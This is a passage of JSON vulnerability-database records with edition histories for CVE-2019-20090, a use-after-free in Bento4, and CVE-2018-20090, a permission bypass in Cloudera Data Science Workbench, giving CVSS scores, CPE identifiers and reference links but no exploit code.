"id": "CVE-2019-20090", "lastseen": "2019-12-31T12:36:45", "modified": "2019-12-30T13:35:00", "objectVersion": "1.3", "published": "2019-12-30T04:15:00", "references": ["https://github.com/axiomatic-systems/Bento4/issues/461"], "reporter": "cve@mitre.org", "title": "CVE-2019-20090", "type": "cve", "viewCount": 57}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 2, "lastseen": "2019-12-31T12:36:45"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "axiosys:bento4", "name": "axiosys bento4", "operator": "eq", "version": "1.5.1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:axiosys:bento4:1.5.1.0"], "cpe23": ["cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2019-20090"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-416"], "description": "An issue was discovered in Bento4 1.5.1.0. There is a use-after-free in AP4_Sample::GetOffset in Core/Ap4Sample.h when called from Ap4LinearReader.cpp.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:54:33", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T14:54:33", "rev": 2, "value": 1.5, "vector": "NONE"}}, "hash": "44b552ec671f26918e8520cb6f089193640ac2b268d13173f9ba28faf9a12454", "hashmap": [{"hash": "62031c2a868eba7d69bbab08b22ae213", "key": "title"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "6e8bd440f4fb55ae63bba09dfc27a808", "key": "cwe"}, {"hash": "47ced18b612f694daa2608e38333e25c", "key": "cpe"}, {"hash": "df2705e016fa182d0a2e423adccd2e1b", "key": "modified"}, {"hash": "5bc53355dce17cb2548e22adfc5d5784", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "234b3d22ecb87e1cdef3403e3bf5d278", "key": "cpe23"}, {"hash": "715c352b1417612a17c041f28800ee72", "key": "href"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "955299dceef23d332206ba4e017eda9e", "key": "references"}, {"hash": "eba02c3711abbf8b7c56e58b733e9f39", "key": "affectedSoftware"}, {"hash": "70d22c5efc8b5ab72e7dcdf19803b6c0", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "67b6cc116f4b6b7ece21a8a8312f3628", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20090", "id": "CVE-2019-20090", "lastseen": "2020-09-21T14:54:33", "modified": "2020-01-07T14:36:00", "objectVersion": "1.3", "published": "2019-12-30T04:15:00", "references": ["https://github.com/axiomatic-systems/Bento4/issues/461"], "reporter": "cve@mitre.org", "title": "CVE-2019-20090", "type": "cve", "viewCount": 58}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:54:33"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "axiosys:bento4", "name": "axiosys bento4", "operator": "eq", "version": "1.5.1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:axiosys:bento4:1.5.1.0"], "cpe23": ["cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2019-20090"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-416"], "description": "An issue was discovered in Bento4 1.5.1.0. There is a use-after-free in AP4_Sample::GetOffset in Core/Ap4Sample.h when called from Ap4LinearReader.cpp.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T07:12:58", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T07:12:58", "rev": 2, "value": 1.5, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/axiomatic-systems/Bento4/issues/461", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "Issue Tracking"], "url": "https://github.com/axiomatic-systems/Bento4/issues/461"}], "hash": "455bc2583ec83c523431cc866feed7531afcae0bdcb84ee54069eda2c8f104f8", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "62031c2a868eba7d69bbab08b22ae213", "key": "title"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "6e8bd440f4fb55ae63bba09dfc27a808", "key": "cwe"}, {"hash": "47ced18b612f694daa2608e38333e25c", "key": "cpe"}, {"hash": "df2705e016fa182d0a2e423adccd2e1b", "key": "modified"}, {"hash": "5bc53355dce17cb2548e22adfc5d5784", "key": "published"}, {"hash": "234b3d22ecb87e1cdef3403e3bf5d278", "key": "cpe23"}, {"hash": "715c352b1417612a17c041f28800ee72", "key": "href"}, {"hash": "1384068fbd8bc4f34a3a4a821a5848fe", "key": "cvss3"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "a59cc3d96ca2bf1c6d3ffea33d89e00f", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "955299dceef23d332206ba4e017eda9e", "key": "references"}, {"hash": "eba02c3711abbf8b7c56e58b733e9f39", "key": "affectedSoftware"}, {"hash": "70d22c5efc8b5ab72e7dcdf19803b6c0", "key": "cvelist"}, {"hash": "43c9e423edfaca6ca902a0ceb684accb", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "67b6cc116f4b6b7ece21a8a8312f3628", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20090", "id": "CVE-2019-20090", "immutableFields": [], "lastseen": "2021-02-02T07:12:58", "modified": "2020-01-07T14:36:00", "objectVersion": "1.5", "published": "2019-12-30T04:15:00", "references": ["https://github.com/axiomatic-systems/Bento4/issues/461"], "reporter": "cve@mitre.org", "title": "CVE-2019-20090", "type": "cve", "viewCount": 61}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T07:12:58"}, {"bulletin": {"affectedSoftware": [{"name": "axiosys bento4", "operator": "eq", "version": "1.5.1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:axiosys:bento4:1.5.1.0"], "cpe23": ["cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*"], "cvelist": ["CVE-2019-20090"], "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cwe": ["CWE-416"], "description": "An issue was discovered in Bento4 1.5.1.0. There is a use-after-free in AP4_Sample::GetOffset in Core/Ap4Sample.h when called from Ap4LinearReader.cpp.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-01-08T12:43:35", "references": [], "rev": 2}, "score": {"modified": "2020-01-08T12:43:35", "rev": 2, "value": 1.5, "vector": "NONE"}}, "hash": "42d9f7c8215800206570357e039ff1068c6fac4b7cf92628dcbb575d4c378a80", "hashmap": [{"hash": "62031c2a868eba7d69bbab08b22ae213", "key": "title"}, {"hash": "f0cab2ed51281c3cddb6cdf3ee00cdac", "key": "cvss2"}, {"hash": "6e8bd440f4fb55ae63bba09dfc27a808", "key": "cwe"}, {"hash": "47ced18b612f694daa2608e38333e25c", "key": "cpe"}, {"hash": "df2705e016fa182d0a2e423adccd2e1b", "key": "modified"}, {"hash": "5bc53355dce17cb2548e22adfc5d5784", "key": "published"}, {"hash": "227fb0e387034de551731ba5fcb027b9", "key": "affectedSoftware"}, {"hash": "234b3d22ecb87e1cdef3403e3bf5d278", "key": "cpe23"}, {"hash": "715c352b1417612a17c041f28800ee72", "key": "href"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "955299dceef23d332206ba4e017eda9e", "key": "references"}, {"hash": "70d22c5efc8b5ab72e7dcdf19803b6c0", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "67b6cc116f4b6b7ece21a8a8312f3628", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20090", "id": "CVE-2019-20090", "lastseen": "2020-01-08T12:43:35", "modified": "2020-01-07T14:36:00", "objectVersion": "1.3", "published": "2019-12-30T04:15:00", "references": ["https://github.com/axiomatic-systems/Bento4/issues/461"], "reporter": "cve@mitre.org", "title": "CVE-2019-20090", "type": "cve", "viewCount": 58}, "differentElements": ["cvss3", "affectedSoftware"], "edition": 3, "lastseen": "2020-01-08T12:43:35"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "eba02c3711abbf8b7c56e58b733e9f39"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "47ced18b612f694daa2608e38333e25c"}, {"key": "cpe23", "hash": "234b3d22ecb87e1cdef3403e3bf5d278"}, {"key": "cpeConfiguration", "hash": "20fd25d3e95f8c7230f7e58b71239223"}, {"key": "cvelist", "hash": "70d22c5efc8b5ab72e7dcdf19803b6c0"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "cvss2", "hash": "f0cab2ed51281c3cddb6cdf3ee00cdac"}, {"key": "cvss3", "hash": "1384068fbd8bc4f34a3a4a821a5848fe"}, {"key": "cwe", "hash": "6e8bd440f4fb55ae63bba09dfc27a808"}, {"key": "description", "hash": "67b6cc116f4b6b7ece21a8a8312f3628"}, {"key": "extraReferences", "hash": "a59cc3d96ca2bf1c6d3ffea33d89e00f"}, {"key": "href", "hash": "715c352b1417612a17c041f28800ee72"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "df2705e016fa182d0a2e423adccd2e1b"}, {"key": "published", "hash": "5bc53355dce17cb2548e22adfc5d5784"}, {"key": "references", "hash": "955299dceef23d332206ba4e017eda9e"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "62031c2a868eba7d69bbab08b22ae213"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "390b2742d4b2a3e0b1f41e75cfc5e4d30b8ce8bddc0b7b15e849ffdbc93b9823", "viewCount": 64, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-23T00:45:21", "rev": 2}, "score": {"value": 1.5, "vector": "NONE", "modified": "2021-04-23T00:45:21", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:axiosys:bento4:1.5.1.0"], "affectedSoftware": [{"cpeName": "axiosys:bento4", "name": "axiosys bento4", "operator": "eq", "version": "1.5.1.0"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-416"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/axiomatic-systems/Bento4/issues/461", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit", "Issue Tracking"], "url": "https://github.com/axiomatic-systems/Bento4/issues/461"}], "immutableFields": []}, {"id": "CVE-2018-20090", "bulletinFamily": "NVD", "title": "CVE-2018-20090", "description": "An issue was discovered in Cloudera Data Science Workbench (CDSW) 1.4.0 through 1.4.2. Authenticated users can bypass project permission checks and gain read-write access to any project folder.", "published": "2019-11-26T16:15:00", "modified": "2019-12-12T15:10:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20090", "reporter": "cve@mitre.org", "references": ["https://docs.cloudera.com/documentation/other/security-bulletins/topics/Security-Bulletin.html#TSB-351"], "cvelist": ["CVE-2018-20090"], "type": "cve", "lastseen": "2021-04-23T00:24:26", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "cloudera:data_science_workbench", "name": "cloudera data science workbench", "operator": "le", "version": "1.4.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:cloudera:data_science_workbench:1.4.2"], "cpe23": ["cpe:2.3:a:cloudera:data_science_workbench:1.4.2:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:cloudera:data_science_workbench:1.4.2:*:*:*:*:*:*:*", "versionEndIncluding": "1.4.2", "versionStartIncluding": "1.4.0", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-20090"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, "cwe": ["CWE-276"], "description": "An issue was discovered in Cloudera Data Science Workbench (CDSW) 1.4.0 through 1.4.2. Authenticated users can bypass project permission checks and gain read-write access to any project folder.", "edition": 7, "enchantments": {"dependencies": {"modified": "2021-02-02T06:52:34", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T06:52:34", "rev": 2, "value": 3.6, "vector": "NONE"}}, "extraReferences": [{"name": "https://docs.cloudera.com/documentation/other/security-bulletins/topics/Security-Bulletin.html#TSB-351", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://docs.cloudera.com/documentation/other/security-bulletins/topics/Security-Bulletin.html#TSB-351"}], "hash": "6dd69d8d056ec6ddca188dce85afced5e78a03fc2b26e6141095751a0e31552f", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f0b6cd1cb96fa625569929adf2ce275a", "key": "cvss3"}, {"hash": "6815699e6a776bb64460c7885bc789d7", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "fb07d3882bbb1c3f8e818bbd67fad422", "key": "cwe"}, {"hash": "0a0012f00a5c6a048309fa954a2816a2", "key": "modified"}, {"hash": "f50d423ad0f7953802c91abc24316354", "key": "cpeConfiguration"}, {"hash": "c615c5f44e2f71f10f8cca4a91b21be3", "key": "href"}, {"hash": "b5ef62c5c54f1070a854f021b7bee054", "key": "cpe"}, {"hash": "7e92dbc80227bea04e7e0d4eea3a7b86", "key": "title"}, {"hash": "c74cb3b4ad9747543c4343004196c086", "key": "extraReferences"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "b3158e5cd669fc65a7aabf14da33e71a", "key": "references"}, {"hash": "5c457d787b1406570ac95c03aae2c7ca", "key": "cpe23"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "e39687d2455aca6cad37fdbf402d3d9d", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "c86d85c9ccbc2ae7ec0076167c525754", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "de2a1fd5b98672b66b901b35cdf8ecb2", "key": "affectedSoftware"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20090", "id": "CVE-2018-20090", "immutableFields": [], "lastseen": "2021-02-02T06:52:34", "modified": "2019-12-12T15:10:00", "objectVersion": "1.5", "published": "2019-11-26T16:15:00", "references": ["https://docs.cloudera.com/documentation/other/security-bulletins/topics/Security-Bulletin.html#TSB-351"], "reporter": "cve@mitre.org", "title": "CVE-2018-20090", "type": "cve", "viewCount": 4}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T06:52:34"}, {"bulletin": {"affectedSoftware": [{"name": "cloudera data_science_workbench", "operator": "eq", "version": "1.4.2"}, {"name": "cloudera data_science_workbench", "operator": "eq", "version": "1.4.0"}, {"name": "cloudera data_science_workbench", "operator": "eq", "version": "1.4.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:cloudera:data_science_workbench:1.4.2", "cpe:/a:cloudera:data_science_workbench:1.4.1", "cpe:/a:cloudera:data_science_workbench:1.4.0"], "cpe23": [], "cvelist": ["CVE-2018-20090"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-276"], "description": "An issue was discovered in Cloudera Data Science Workbench (CDSW) 1.4.0 through 1.4.2. Authenticated users can bypass project permission checks and gain read-write access to any project folder.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-12-15T00:18:19", "references": [], "rev": 2}, "score": {"modified": "2019-12-15T00:18:19", "rev": 2, "value": 3.6, "vector": "NONE"}}, "hash": "1bed21cc915d7912946c69c8b163cc4b3f55d3781c9f9ba0f1c30a27c1d5c819", "hashmap": [{"hash": "2265dac15ca908e21959e0e19d41da69", "key": "cpe"}, {"hash": "6815699e6a776bb64460c7885bc789d7", "key": "cvelist"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "fb07d3882bbb1c3f8e818bbd67fad422", "key": "cwe"}, {"hash": "0a0012f00a5c6a048309fa954a2816a2", "key": "modified"}, {"hash": "c615c5f44e2f71f10f8cca4a91b21be3", "key": "href"}, {"hash": "79c629677ffd3c2ec5259090d443f66f", "key": "affectedSoftware"}, {"hash": "7e92dbc80227bea04e7e0d4eea3a7b86", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "b3158e5cd669fc65a7aabf14da33e71a", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "e39687d2455aca6cad37fdbf402d3d9d", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "c86d85c9ccbc2ae7ec0076167c525754", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20090", "id": "CVE-2018-20090", "lastseen": "2019-12-15T00:18:19", "modified": "2019-12-12T15:10:00", "objectVersion": "1.3", "published": "2019-11-26T16:15:00", "references": ["https://docs.cloudera.com/documentation/other/security-bulletins/topics/Security-Bulletin.html#TSB-351"], "reporter": "cve@mitre.org", "title": "CVE-2018-20090", "type": "cve", "viewCount": 2}, "differentElements": ["cpe23", "cvss3", "cpe", "affectedSoftware"], "edition": 2, "lastseen": "2019-12-15T00:18:19"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "cloudera:data_science_workbench", "name": "cloudera data science workbench", "operator": "le", "version": "*"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:cloudera:data_science_workbench:1.4.2"], "cpe23": ["cpe:2.3:a:cloudera:data_science_workbench:1.4.2:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:cloudera:data_science_workbench:1.4.2:*:*:*:*:*:*:*", "versionEndIncluding": "1.4.2", "versionStartIncluding": "1.4.0", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-20090"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, "cwe": ["CWE-276"], "description": "An issue was discovered in Cloudera Data Science Workbench (CDSW) 1.4.0 through 1.4.2. Authenticated users can bypass project permission checks and gain read-write access to any project folder.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-11-30T00:34:38", "references": [], "rev": 2}, "score": {"modified": "2020-11-30T00:34:38", "rev": 2, "value": 3.6, "vector": "NONE"}}, "hash": "cf07f42d1a3600fd903dcd0ea7a0c403ac1a9a4cf4a493c1059cb4c3da55d791", "hashmap": [{"hash": "f0b6cd1cb96fa625569929adf2ce275a", "key": "cvss3"}, {"hash": "6815699e6a776bb64460c7885bc789d7", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "fb07d3882bbb1c3f8e818bbd67fad422", "key": "cwe"}, {"hash": "0a0012f00a5c6a048309fa954a2816a2", "key": "modified"}, {"hash": "f50d423ad0f7953802c91abc24316354", "key": "cpeConfiguration"}, {"hash": "c615c5f44e2f71f10f8cca4a91b21be3", "key": "href"}, {"hash": "10cb7c9b9cd853bed5987a04a91ba644", "key": "affectedSoftware"}, {"hash": "b5ef62c5c54f1070a854f021b7bee054", "key": "cpe"}, {"hash": "7e92dbc80227bea04e7e0d4eea3a7b86", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "b3158e5cd669fc65a7aabf14da33e71a", "key": "references"}, {"hash": "5c457d787b1406570ac95c03aae2c7ca", "key": "cpe23"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "e39687d2455aca6cad37fdbf402d3d9d", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "c86d85c9ccbc2ae7ec0076167c525754", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20090", "id": "CVE-2018-20090", "lastseen": "2020-11-30T00:34:38", "modified": "2019-12-12T15:10:00", "objectVersion": "1.3", "published": "2019-11-26T16:15:00", "references": ["https://docs.cloudera.com/documentation/other/security-bulletins/topics/Security-Bulletin.html#TSB-351"], "reporter": "cve@mitre.org", "title": "CVE-2018-20090", "type": "cve", "viewCount": 3}, "differentElements": ["affectedSoftware"], "edition": 5, "lastseen": "2020-11-30T00:34:38"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "cloudera:data_science_workbench", "name": "cloudera data science workbench", "operator": "le", "version": "1.4.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:cloudera:data_science_workbench:1.4.2"], "cpe23": ["cpe:2.3:a:cloudera:data_science_workbench:1.4.2:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": 